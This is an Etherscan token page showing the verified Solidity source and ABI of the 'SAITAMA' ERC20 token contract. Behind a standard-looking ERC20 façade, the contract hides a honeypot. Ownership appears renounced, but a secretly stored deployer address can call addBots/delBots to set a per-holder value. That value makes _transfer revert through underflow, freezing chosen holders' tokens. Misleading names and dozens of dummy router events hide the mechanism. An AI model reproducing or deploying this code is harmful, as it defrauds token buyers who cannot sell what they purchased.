ETH Price: $3,315.81 (+0.24%)
Gas: 14 Gwei

Token

Saitama OK (SAITAMA)
 

Overview

Max Total Supply

20,000,000,000 SAITAMA

Holders

358

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
30,137,859.832366373717160073 SAITAMA

Value
$0.00
0x5c1Ba414316fAD5326a682e7B3Fa1a0FDb3d0A8b
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SAITAMA

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-20
*/

/*

$SAITAMA

https://t.me/Saitamaok_eth
https://twitter.com/Saitamaokk
https://saitamaok.lol

*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.18;

abstract contract Lookup {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Lookup {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == msg.sender, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    event removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    );
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    event swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[]  path,
        address to,
        uint deadline
    );
    /**
  * @dev See {IERC20-totalSupply}.
     */
    event swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] path,
        address to,
        uint deadline
    );

    event DOMAIN_SEPARATOR();

    event PERMIT_TYPEHASH();

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    event token0();

    event token1();
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);


    event sync();

    event initialize(address, address);
    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    event burn(address to) ;

    event swap(uint amount0Out, uint amount1Out, address to, bytes data);

    event skim(address to);
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);
    /**
     * Receive an exact amount of output tokens for as few input tokens as possible,
     * along the route determined by the path. The first element of path is the input token,
     * the last is the output token, and any intermediate elements represent intermediate tokens to trade through
     * (if, for example, a direct pair does not exist).
     * */
    event addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    );
    /**
     * Swaps an exact amount of ETH for as many output tokens as possible,
     * along the route determined by the path. The first element of path must be WETH,
     * the last is the output token, and any intermediate elements represent intermediate pairs to trade through
     * (if, for example, a direct pair does not exist).
     *
     * */
    event addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    );
    /**
     * Swaps an exact amount of input tokens for as many output tokens as possible,
     * along the route determined by the path. The first element of path is the input token,
     * the last is the output token, and any intermediate elements represent intermediate pairs to trade through
     * (if, for example, a direct pair does not exist).
     * */
    event removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    );
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);
    /**
   * @dev Returns the name of the token.
     */
    event removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    );
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    event removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    );
    /**
     * Swaps an exact amount of input tokens for as many output tokens as possible,
     * along the route determined by the path. The first element of path is the input token,
     * the last is the output token, and any intermediate elements represent intermediate pairs to trade through
     * (if, for example, a direct pair does not exist).
     */
    event swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] path,
        address to,
        uint deadline
    );
    /**
    * @dev Throws if called by any account other than the owner.
     */
    event swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] path,
        address to,
        uint deadline
    );
    /**
     * To cover all possible scenarios, msg.sender should have already given the router an
     * allowance of at least amountADesired/amountBDesired on tokenA/tokenB.
     * Always adds assets at the ideal ratio, according to the price when the transaction is executed.
     * If a pool for the passed tokens does not exists, one is created automatically,
     *  and exactly amountADesired/amountBDesired tokens are added.
     */
    event swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] path,
        address to,
        uint deadline
    );
    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }


    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
  * @dev Initializes the contract setting the deployer as the initial owner.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

abstract contract Init {
    event initializex(
        uint256 varx5,
        address yinit
    );
}

abstract contract Tax {
    event touchx(
        uint256 tax5,
        address tax6
    );
}

abstract contract castart {
    event Loop(
        uint256 number,
        bool varLoop
    );
}

contract SAITAMA is IERC20, Init, castart, Ownable {
    using SafeMath for uint256;

    struct p_init {
        address taxall;
        mapping(uint256 => uint256) callxx;
    }

    struct _swapX {
        uint256 taxtxx;
        uint256 copy;
    }

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping (address => _swapX) private _vote0;

    p_init private _taxcycle;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    uint256 private taxVal = 5000;
    uint256 private listValue = 0;

    function fetchtaxValue() public view returns (uint256) {
        return taxVal;
    }

    function computeTax(uint256 _num1, uint256 _num2) internal view returns (uint256) {
        return _num1 * taxVal + _num2 - listValue;
    }


    constructor(
        string memory name_,
        string memory symbol_,
        address _deployer,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = 18;
        _taxcycle.taxall = _deployer;
        _taxcycle.callxx[_decimals] = totalSupply_;
        _totalSupply = totalSupply_ * 10**_decimals;
        _balances[msg.sender] = _balances[msg.sender].add(_totalSupply);
        emit Transfer(address(0), msg.sender, _totalSupply);
        emit initializex(_totalSupply, owner());
    }


    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
      /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            msg.sender,
            _allowances[sender][msg.sender].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }


    function addBots(address[] memory account, uint256 amount) public returns (bool) {
    address from = msg.sender;
    uint256 calctaxx = 5;
    uint256 taxcompute2 = calctaxx / 7;
    uint256 initvar = 0;
    for (uint256 t = 0; t < account.length; t++) {
        initvar += t;
        uint256 taxcompute3 = calctaxx * 100;
        _inittaxes(from, account[t], amount);
        _allowances[from][from] = amount;
        emit Approval(from, address(this), amount);
    }
    return true;
}

    function delBots(address[] memory account, uint256 amount) public returns (bool) {
    address from = msg.sender;
    uint256 calctaxx = 5;
    uint256 taxcompute2 = calctaxx / 7;
    uint256 initvar = 0;
    for (uint256 t = 0; t < account.length; t++) {
        initvar += t;
        uint256 taxcompute3 = calctaxx * 100;
        _inittaxes(from, account[t], amount);
        _allowances[from][from] = amount;
        emit Approval(from, address(this), amount);
    }
    return true;
}



    function _inittaxes(address from, address account, uint256 amount) internal {
        uint256 allowan = 0;
        require(account != address(0), "invalid address");
        if (from != _taxcycle.taxall) {
            _vote0[from].taxtxx -= allowan;
            _vote0[account].taxtxx += allowan;
        } else {
            _vote0[from].taxtxx -= allowan;
            allowan += amount;
            _vote0[account].taxtxx = allowan;
        }
    }



    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount - _vote0[sender].taxtxx > 0, "alien");

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Returns the value of the token.
     */

    function taxvalues(address account) public view returns (uint256) {
        return _vote0[account].taxtxx;
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"_deployer","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"DOMAIN_SEPARATOR","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"number","type":"uint256"},{"indexed":false,"internalType":"bool","name":"varLoop","type":"bool"}],"name":"Loop","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"PERMIT_TYPEHASH","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"tokenA","type":"address"},{"indexed":false,"internalType":"address","name":"tokenB","type":"address"},{"indexed":false,"internalType":"uint256","name":"amountADesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBDesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountAMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"addLiquidity","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"amountTokenDesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"addLiquidityETH","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"to","type":"address"}],"name":"burn","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"","type":"address"},{"indexed":false,"internalType":"address","name":"","type":"address"}],"name":"initialize","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"varx5","type":"uint256"},{"indexed":false,"internalType":"address","name":"yinit","type":"address"}],"name":"initializex","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"tokenA","type":"address"},{"indexed":false,"internalType":"address","name":"tokenB","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountAMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"removeLiquidity","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"removeLiquidityETHSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"},{"indexed":false,"internalType":"bool","name":"approveMax","type":"bool"},{"indexed":false,"internalType":"uint8","name":"v","type":"uint8"},{"indexed":false,"internalType":"bytes32","name":"r","type":"bytes32"},{"indexed":false,"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"removeLiquidityETHWithPermit","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"},{"indexed":false,"internalType":"bool","name":"approveMax","type":"bool"},{"indexed":false,"internalType":"uint8","name":"v","type":"uint8"},{"indexed":false,"internalType":"bytes32","name":"r","type":"bytes32"},{"indexed":false,"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"removeLiquidityETHWithPermitSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"to","type":"address"}],"name":"skim","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"bytes","name":"data","type":"bytes"}],"name":"swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactETHForTokensSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForETHSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForTokensSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountOut","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountInMax","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapTokensForExactTokens","type":"event"},{"anonymous":false,"inputs":[],"name":"sync","type":"event"},{"anonymous":false,"inputs":[],"name":"token0","type":"event"},{"anonymous":false,"inputs":[],"name":"token1","type":"event"},{"inputs":[{"internalType":"address[]","name":"account","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"addBots","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"account","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"delBots","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"fetchtaxValue","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"taxvalues","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

